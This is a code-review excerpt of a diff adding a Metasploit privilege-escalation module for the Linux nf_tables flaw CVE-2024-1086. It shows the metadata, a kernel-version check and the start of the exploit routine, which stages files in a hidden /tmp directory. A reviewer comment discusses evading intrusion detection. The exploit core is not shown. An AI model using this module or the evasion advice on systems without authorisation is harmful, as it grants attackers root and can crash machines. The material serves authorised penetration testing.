modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb

```diff
@@ -0,0 +1,177 @@
+
+          Successful exploitation will likely crash the original shell.
+
+          Failed exploitation will likely HARD crash the system or put it into an unreliable state
+          and it will need a physical reset/reboot. Attempted re-exploitation without a reboot will
+          hard crash the system.
+
+          Tested against a VM of Ubuntu 22.04 (Linux 5.15.0-60-generic)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Notselwyn' # original PoC
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://pwning.tech/nftables/'],
+          [ 'URL', 'https://github.com/Notselwyn/CVE-2024-1086'],
+          [ 'CVE', '2024-1086']
+        ],
+        'DefaultOptions' => {
+          # without these the system seems to hard crash in 2-6min
+          # with these i've had both shells and the system stable for over an hour
+          'PrependMigrate' => true,
+          'PrependFork' => true
+        },
+        'DisclosureDate' => '2024-01-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'Reliability' => [UNRELIABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # there is likely backporting going on per distro as well
+    release = kernel_release
+    if (
+      Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
+      Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
+    ) ||
+       (
+        Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
+        Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
+      )
+      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
+    end
+
+    CheckCode::Safe("Kernel version #{release} is not vulnerable")
+  end
+
+  def check_musl_tools?
+    lib = cmd_exec('dpkg --get-selections | grep musl-tools')
+    if lib.include?('musl-tools')
+      vprint_good('musl-tools is installed')
+      return true
+    else
+      print_error('musl-tools is not installed.  Compiling will fail.')
+    end
+    false
+  end
+
+  def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    nested_base = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
```

Comment:
A couple of IDS are flagging binary execution happening instead hidden folders. I think it'd be better to let the user specify the full path of the folder.